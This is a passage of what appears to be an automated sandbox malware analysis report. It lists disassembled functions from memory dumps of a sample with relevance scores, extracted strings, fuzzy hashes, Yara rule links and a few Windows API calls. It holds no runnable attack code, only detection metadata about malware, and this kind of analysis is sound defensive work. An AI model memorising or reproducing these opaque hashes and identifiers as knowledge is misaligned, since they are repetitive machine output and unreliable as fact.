                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cc1dde96a411e1e6fcd6a59f7ef47bdc2781b26c4dfcad69bf9094ee8fc7f5bd
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 233242B0601B469FDB48CF26D580389BBB1FF45300F5486A8C9695FB5ADB35A892CFC0
                                                                                                                                                                                                                                                                          Function 00423A34 Relevance: 10.4, Strings: 8, Instructions: 446COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: 4%$>V$>V$<>$EG$IK$UW$|~
                                                                                                                                                                                                                                                                          • API String ID: 0-2246970021
                                                                                                                                                                                                                                                                          • Opcode ID: cc1dde96a411e1e6fcd6a59f7ef47bdc2781b26c4dfcad69bf9094ee8fc7f5bd
                                                                                                                                                                                                                                                                          • Instruction ID: f89536dd89445c36d0748b7bd4a9cf4b738649ea5c65e76590e6169531de8307
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cc1dde96a411e1e6fcd6a59f7ef47bdc2781b26c4dfcad69bf9094ee8fc7f5bd
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C43242B0611B569FDB48CF26D580389BBB1FF45300F548698C9695FB4ADB35A8A2CFC0
                                                                                                                                                                                                                                                                          Function 00425E90 Relevance: 9.4, APIs: 1, Strings: 4, Instructions: 648COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: *mB$67$@iB$V3R5
                                                                                                                                                                                                                                                                          • API String ID: 0-119712241
                                                                                                                                                                                                                                                                          • Opcode ID: 2752cfb5aefe83a77e1e275bbb3611267d68b1f03f1cd38cb6bb80b62f128883
                                                                                                                                                                                                                                                                          • Instruction ID: f8f986030c5c516667fa2fb6bcf2798bb7f33b75dff4277953ef0512ab11a316
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2752cfb5aefe83a77e1e275bbb3611267d68b1f03f1cd38cb6bb80b62f128883
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6A2258716083548BC728DF68E85176FB7E1EFC5304F49893DE9868B392EB349905CB86
                                                                                                                                                                                                                                                                          Function 004205B0 Relevance: 8.0, Strings: 6, Instructions: 481COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: &'$0c=e$2g1i$<k;m$B$wy
                                                                                                                                                                                                                                                                          • API String ID: 0-2430453506
                                                                                                                                                                                                                                                                          • Opcode ID: eb1d602c92fd99bd83cb42d187dbb3c1cba3f1d687f489207edda56632bda968
                                                                                                                                                                                                                                                                          • Instruction ID: efc43d6a55d29c5113b9513135886848320c4b4fba7a0b6b3d57c2edb9ba0087
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: eb1d602c92fd99bd83cb42d187dbb3c1cba3f1d687f489207edda56632bda968
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 26D127B56083118BD724DF25D85276BB7F2EFE2314F58992CE4828B3A5F7789801CB46
                                                                                                                                                                                                                                                                          Function 00B0C8B1 Relevance: 7.8, Strings: 6, Instructions: 346COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_ae0000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: &=$0$5$D@6T$EF$zJyL
                                                                                                                                                                                                                                                                          • API String ID: 0-3264166258
                                                                                                                                                                                                                                                                          • Opcode ID: 6f787935f52e1d9f41ee2cdf27def6dc2193743486b37ecbc705986605444a77
                                                                                                                                                                                                                                                                          • Instruction ID: 12611c0b4a176b7151f444d1137104aa69985d78de6bf22a88dd7092bad47809
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6f787935f52e1d9f41ee2cdf27def6dc2193743486b37ecbc705986605444a77
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 06B1E67010C3818AE368CF29C4917ABBFD2EFD2304F288AADD4D98B2D1DB748549D756
                                                                                                                                                                                                                                                                          Function 0042C64A Relevance: 7.8, Strings: 6, Instructions: 346COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: &=$0$5$D@6T$EF$zJyL
                                                                                                                                                                                                                                                                          • API String ID: 0-3264166258
                                                                                                                                                                                                                                                                          • Opcode ID: 6f787935f52e1d9f41ee2cdf27def6dc2193743486b37ecbc705986605444a77
                                                                                                                                                                                                                                                                          • Instruction ID: f15181a2a9622c2e50c414abf7a3ac4626398852fa6a8a653e4f6d86baaa0204
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6f787935f52e1d9f41ee2cdf27def6dc2193743486b37ecbc705986605444a77
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 62B1087020C3918AE324CF2994917BFBBD2AFD6304F588A6ED4D987391DB788449C757
                                                                                                                                                                                                                                                                          Function 00AE89F7 Relevance: 7.6, APIs: 5, Instructions: 146threadCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 00AE8A1B
                                                                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00AE8A25
                                                                                                                                                                                                                                                                          • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 00AE8AC2
                                                                                                                                                                                                                                                                          • GetForegroundWindow.USER32 ref: 00AE8AD7
                                                                                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 00AE8BD9
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_ae0000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 4063528623-0
                                                                                                                                                                                                                                                                          • Opcode ID: 7b623bcc5e135466e494fc7f4101763bd35fdd0b5e674fc8217798d0a0a97a45
                                                                                                                                                                                                                                                                          • Instruction ID: 5f86f26a9c8b2924393a5290358a5fb616db895037bc318f17344b9791255d8e
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7b623bcc5e135466e494fc7f4101763bd35fdd0b5e674fc8217798d0a0a97a45
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 24417E77F4431807D71CAEB58C9A3AEB6D69BC4314F0A803E6985AB390DD7D5C0552C1
                                                                                                                                                                                                                                                                          Function 00422E93 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 394COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: )*$X9{;$r1B
                                                                                                                                                                                                                                                                          • API String ID: 0-1001561910
                                                                                                                                                                                                                                                                          • Opcode ID: 8dd660af85e9b30ff04e02c10e609101b9a09426abdb28fd85c75e4d1b9bc82c
                                                                                                                                                                                                                                                                          • Instruction ID: a1479a56b64214e2a7fc54a03e2bd96b94a4879ed58cb61811aa9170273c6ab6
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8dd660af85e9b30ff04e02c10e609101b9a09426abdb28fd85c75e4d1b9bc82c
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 94D1BAB06083419FD3009F59E88166BBBE0FF96309F54892DF5818B351E3B8DA09CB5A
                                                                                                                                                                                                                                                                          Function 0041BEA0 Relevance: 6.9, Strings: 5, Instructions: 684COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: -$C\$Iz$[^$de
                                                                                                                                                                                                                                                                          • API String ID: 0-3020956940
                                                                                                                                                                                                                                                                          • Opcode ID: f819af1d85e380cc0a90eb61a19dfdbbe2cdd3936953633e8d3f19afdb44e2e0
                                                                                                                                                                                                                                                                          • Instruction ID: e1ce7c89e45d16bcd91c54bb6943d2a9f79ffbc50f6667256eaf7ee8aaf95e0a
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f819af1d85e380cc0a90eb61a19dfdbbe2cdd3936953633e8d3f19afdb44e2e0
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C012237654C3108FC314CFA8C8926ABBBE2EFD5314F18892DE4E58B391E7789505CB86
                                                                                                                                                                                                                                                                          Function 00B00817 Relevance: 6.7, Strings: 5, Instructions: 481COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_ae0000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: &'$0c=e$2g1i$<k;m$wy
                                                                                                                                                                                                                                                                          • API String ID: 0-3335612808
                                                                                                                                                                                                                                                                          • Opcode ID: eb1d602c92fd99bd83cb42d187dbb3c1cba3f1d687f489207edda56632bda968
                                                                                                                                                                                                                                                                          • Instruction ID: 8b484252c68323650f17082b747cc0c325edaf5dd513adc908146495f9859f88
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: eb1d602c92fd99bd83cb42d187dbb3c1cba3f1d687f489207edda56632bda968
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 04D108B56183018BD724DF25C85276BBBF2EFA2314F189A6CE4828B394F7799801C752
                                                                                                                                                                                                                                                                          Function 00B0C94B Relevance: 6.6, Strings: 5, Instructions: 336COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_ae0000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: &=$5$D@6T$EF$zJyL
                                                                                                                                                                                                                                                                          • API String ID: 0-923305466
                                                                                                                                                                                                                                                                          • Opcode ID: f99561a0788cee97c829df764e2ebd4c7b90c8b56b0bfd503a4f7d65a1aead45
                                                                                                                                                                                                                                                                          • Instruction ID: 609999984bc9c998e792b9c0a6681b290f728827b7030e3e4f8b4e4a923cf430
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f99561a0788cee97c829df764e2ebd4c7b90c8b56b0bfd503a4f7d65a1aead45
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 98A1E87110C3818BE368CF2984917ABBFD2EFD2314F289AADD4D98B2D1DB748449C756
                                                                                                                                                                                                                                                                          Function 0042C6E4 Relevance: 6.6, Strings: 5, Instructions: 336COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: &=$5$D@6T$EF$zJyL
                                                                                                                                                                                                                                                                          • API String ID: 0-923305466
                                                                                                                                                                                                                                                                          • Opcode ID: f99561a0788cee97c829df764e2ebd4c7b90c8b56b0bfd503a4f7d65a1aead45
                                                                                                                                                                                                                                                                          • Instruction ID: a1ece66a1846d5f05b18afa13e78785737907ef84dba56bd06699bfcf49e878d
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f99561a0788cee97c829df764e2ebd4c7b90c8b56b0bfd503a4f7d65a1aead45
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 16A1097120C3918AE364CF2994917AFBBD2AFD2304F588A6ED4C987391DB788449C757
                                                                                                                                                                                                                                                                          Function 00B0C99C Relevance: 6.6, Strings: 5, Instructions: 335COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_ae0000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: &=$5$D@6T$EF$zJyL
                                                                                                                                                                                                                                                                          • API String ID: 0-923305466
                                                                                                                                                                                                                                                                          • Opcode ID: 5eea70b87afb6f6764b4b0a803c2ee816a1ddf72bf9f3ac6a73094afb86f43b5
                                                                                                                                                                                                                                                                          • Instruction ID: 71f30160ed923e9dd3d401b587b1b5701c6a2abb8fb68add29ff13792d337fd1
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5eea70b87afb6f6764b4b0a803c2ee816a1ddf72bf9f3ac6a73094afb86f43b5
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0DA1E77010C3818BE364CF2984917ABBFD2EBD2304F289AADD4D98B2D1DB748549C756
                                                                                                                                                                                                                                                                          Function 0042C735 Relevance: 6.6, Strings: 5, Instructions: 335COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: &=$5$D@6T$EF$zJyL
                                                                                                                                                                                                                                                                          • API String ID: 0-923305466
                                                                                                                                                                                                                                                                          • Opcode ID: 5eea70b87afb6f6764b4b0a803c2ee816a1ddf72bf9f3ac6a73094afb86f43b5
                                                                                                                                                                                                                                                                          • Instruction ID: a1affb31d16800ef8c6cc435bb9674081fedb8b39f933f67ef20babcac88fb25
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5eea70b87afb6f6764b4b0a803c2ee816a1ddf72bf9f3ac6a73094afb86f43b5
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6BA1097020C3918AE324CF2994D17AFBBD2AFD2304F688A6ED4D987391DB788449C757
                                                                                                                                                                                                                                                                          Function 00B0C98D Relevance: 6.6, Strings: 5, Instructions: 312COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_ae0000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: &=$5$D@6T$EF$zJyL
                                                                                                                                                                                                                                                                          • API String ID: 0-923305466
                                                                                                                                                                                                                                                                          • Opcode ID: 964c76fda7f37207e59e987132c18f71186e6d03fd2999a299809d292455ad42
                                                                                                                                                                                                                                                                          • Instruction ID: 471ea1c30f5aa69f8a04c4466285c50d64c0d3b65cd13037b4dd15924b54c977
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 964c76fda7f37207e59e987132c18f71186e6d03fd2999a299809d292455ad42
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 50A1D47110C3818AE364CF2984917ABBFD2EFE2304F289AADD4D98B2D1DB748449C756
                                                                                                                                                                                                                                                                          Function 0042C726 Relevance: 6.6, Strings: 5, Instructions: 312COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: &=$5$D@6T$EF$zJyL
                                                                                                                                                                                                                                                                          • API String ID: 0-923305466
                                                                                                                                                                                                                                                                          • Opcode ID: 964c76fda7f37207e59e987132c18f71186e6d03fd2999a299809d292455ad42
                                                                                                                                                                                                                                                                          • Instruction ID: 9bb2126ccc093d793a191dd69b681400b401b97b3b24328c9194ba10bd873eb8
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 964c76fda7f37207e59e987132c18f71186e6d03fd2999a299809d292455ad42
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 16A1077120C3918AD324CF2994917BBBBD2AFD2304F688A5ED4C98B391DB788449C757
                                                                                                                                                                                                                                                                          Function 00415298 Relevance: 6.1, Strings: 4, Instructions: 1123COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: in~x$kmbj$ydij$Z\
                                                                                                                                                                                                                                                                          • API String ID: 0-979945983
                                                                                                                                                                                                                                                                          • Opcode ID: 005fc1fa79f283313d18ab5bef71a17aafbda1228e7aae7fdcae809975c54514
                                                                                                                                                                                                                                                                          • Instruction ID: a7131c4719c006be066284edc26e6de5161f51a5f0bff666fc31d9b99828dd7c
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 005fc1fa79f283313d18ab5bef71a17aafbda1228e7aae7fdcae809975c54514
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 107249B5600701CFD7248F28D8817A7B7B2FF96314F18856EE4968B392E739E842CB55
                                                                                                                                                                                                                                                                          Function 00AFE1E7 Relevance: 5.9, Strings: 4, Instructions: 864COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_ae0000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: &-$)R_X$[O_[$zusR
                                                                                                                                                                                                                                                                          • API String ID: 0-3432275560
                                                                                                                                                                                                                                                                          • Opcode ID: c72d066a0ba9d98f0ff19214e9d8c23779a55738a99cb06a59f657220fc0cf28
                                                                                                                                                                                                                                                                          • Instruction ID: 9a7c73028d07bd3d907d43231084d0923f84785a222f15315389b8d4642b7410
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c72d066a0ba9d98f0ff19214e9d8c23779a55738a99cb06a59f657220fc0cf28
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8442277050C3948FC725DF68C85067EBBE1AF92314F08866DF9E59B3A2D7368905C792
                                                                                                                                                                                                                                                                          Function 0041DF80 Relevance: 5.9, Strings: 4, Instructions: 864COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: &-$)R_X$[O_[$zusR
                                                                                                                                                                                                                                                                          • API String ID: 0-3432275560
                                                                                                                                                                                                                                                                          • Opcode ID: 9c1e88994ed028f5b04327f1d1436afa90b67df79647b043f1f73d1dc9718978
                                                                                                                                                                                                                                                                          • Instruction ID: 5890859bd03ddd88b235fb657101ddbf2934de1c8c3864215f367d42e94b454c
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9c1e88994ed028f5b04327f1d1436afa90b67df79647b043f1f73d1dc9718978
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BD42683850C3908FC725DF29C8507AFBBE1AF96314F08466EE8E44B392D7398945C79A
                                                                                                                                                                                                                                                                          Function 00B0B75E Relevance: 5.5, Strings: 4, Instructions: 523COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_ae0000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: %(#}$/$/26-$1
                                                                                                                                                                                                                                                                          • API String ID: 0-261129489
                                                                                                                                                                                                                                                                          • Opcode ID: f133d09027ec2c5d3c2aef6507ecce0520632deac5b770a07f28f5cb5c76ebf0
                                                                                                                                                                                                                                                                          • Instruction ID: 9248be859a9a08d1b426f4d938abec322d68a6d09ec1d26ce162d1f0d308fdc5
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f133d09027ec2c5d3c2aef6507ecce0520632deac5b770a07f28f5cb5c76ebf0
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 32E1D57111D3C18BE765CF29C491BBABFD6EF92304F1889ADD0D987292DB39850AC712
                                                                                                                                                                                                                                                                          Function 0042B4F7 Relevance: 5.5, Strings: 4, Instructions: 523COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
